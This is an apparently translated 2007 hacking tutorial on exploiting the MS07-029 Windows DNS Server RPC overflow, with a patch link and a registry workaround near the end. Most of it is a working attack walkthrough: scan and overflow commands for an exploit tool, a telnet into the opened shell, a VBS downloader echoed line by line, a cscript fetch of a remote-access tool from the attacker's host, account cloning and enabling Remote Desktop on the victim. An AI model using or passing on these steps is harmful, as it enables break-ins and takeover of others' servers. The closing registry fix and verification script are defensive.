MS07-029: Microsoft DNS Server overflow vulnerability and early warning - Black Bar Safety Net (myhack58)

2007-05-30 00:00:00
Anonymous (佚名)
www.myhack58.com

Author: day の wing httP://Shit.Xmd5.com

Tool on my network hard drive: http://free.ys168.com/?okdgltc

Directory: dd password: ddd

Preface:
MS07-029: the Windows Domain Name System (DNS) Server service has a stack-based buffer overflow in its Remote Procedure Call (RPC) management interface. The vulnerability affects all unpatched versions of Windows 2000 Server and Windows 2003 Server that have the DNS service turned on.

Today, let me lead the way, heroes, as we set off on a DNS exploit.

Let us first look at the tool interface:


This is the legendary exploit tool; it can take down both 2000 Server and 2003 Server systems, and it also has a scan feature!

First, use it to scan the host:
At the command line enter: "dns -s target IP address"


Wait a moment and the open ports and operating system appear in front of us. If, as in the figure, there is a "1029: Vulnerability", then congratulations, you have successfully obtained permission on the host.
The figure means that port 1029 is vulnerable.

Now we come to the most critical step, the overflow:
At the command line enter
dns -2003chs ..93.189 1029
Here -2003chs indicates the operating system version: -2003chs means the Simplified Chinese version of the 2003 system.
If it is a 2000 system, use the "-2000all" parameter. ..93.189 is our target IP address, and 1029 is the vulnerable port found by the scan.


When "Attack sent, check port 1100" appears, it means port 1100 has been opened on the destination address, and we telnet in: TELNET ..93.189 1100


We have now successfully broken into the other party's computer and obtained administrator privileges.

Below I will show everyone how to open 3389 on the broiler (the compromised host).
At the command line enter

@echo with wscript:if .arguments.count^<2 then .quit:end if > tony.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"+web.status:.quit >> tony.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs

Roughly, this creates at the command line a VBS script, tony.vbs, that is used for downloading.

Then upload the open-3389 tool to your personal web space.

Here I used the open-3389 tool by Firefox. At the command line enter

cscript tony.vbs http://<your web space address>/wrsky.exe c:\wrsky.exe


"wrsky.exe -c" clones the current administrator account.

Then enter "c:\wrsky.exe -o 3551"


This means: open the other party's Remote Desktop service, using port 3551.

"wrsky.exe -k" checks whether 3389 is turned on. Once it is on, enter "wrsky.exe -r"; the other computer will reboot automatically, after which you can connect.
In Run, type "mstsc" and log in.


That familiar and intimate picture appears in front of us.

If it is a 2K system there is an even more foolproof tool, open3389: just run it directly, no parameters needed, but the other computer will restart immediately.

In addition, I have also put two other DNS exploit tools and an article by ZWELL, the essence of the subject, on the CD; interested friends can research them on their own.

This vulnerability is enormously harmful: a worm, VanBot, that propagates using the DNS service RPC vulnerability has already appeared, and its variants are spreading wildly.

Friends on Win 2K or 2003, please hurry up and download the patch:
http://www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx

Or open Notepad and enter:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters]

"RpcProtocol"=dword:00000004

Save it as a file with the .REG extension, double-click it to import, and then restart the DNS service.
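The same workaround as an added example (not from the original article): a cmd script that applies the RpcProtocol=4 setting from the .REG file above with reg.exe, restarts the DNS Server service, and verifies the value, so it can be scripted across servers instead of imported by hand. The value 4 restricts DNS management to local LPC calls; remote RPC management (the vulnerable interface) is no longer reachable.

```batch
@echo off
rem Added example, not the article's own tool: apply the MS07-029 workaround.
rem Run from an elevated command prompt on the DNS server.
set KEY=HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

rem Show the current state; the query fails if the value does not exist yet,
rem which means remote RPC management is still enabled.
reg query "%KEY%" /v RpcProtocol 2>nul
if errorlevel 1 echo RpcProtocol is not set: remote RPC management is enabled.

rem Write DWORD 4 (LPC only). /f overwrites any existing value without prompting.
reg add "%KEY%" /v RpcProtocol /t REG_DWORD /d 4 /f
if errorlevel 1 (
    echo Failed to write RpcProtocol. Run this from an elevated prompt.
    exit /b 1
)

rem The setting is read at service start, so restart the DNS Server service.
net stop dns
net start dns

rem Verify: reg query prints REG_DWORD values in hex, so look for 0x4.
reg query "%KEY%" /v RpcProtocol | find "0x4" >nul
if errorlevel 1 (
    echo Verification failed: RpcProtocol is not 4.
    exit /b 1
)
echo Workaround applied: DNS RPC management restricted to local LPC.
```

This only closes the remote management interface; installing the MS07-029 patch from the link above remains the actual fix.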

Finally, thanks to my brothers in the trade who owe me money, and to my lovely GF, for their help with this article.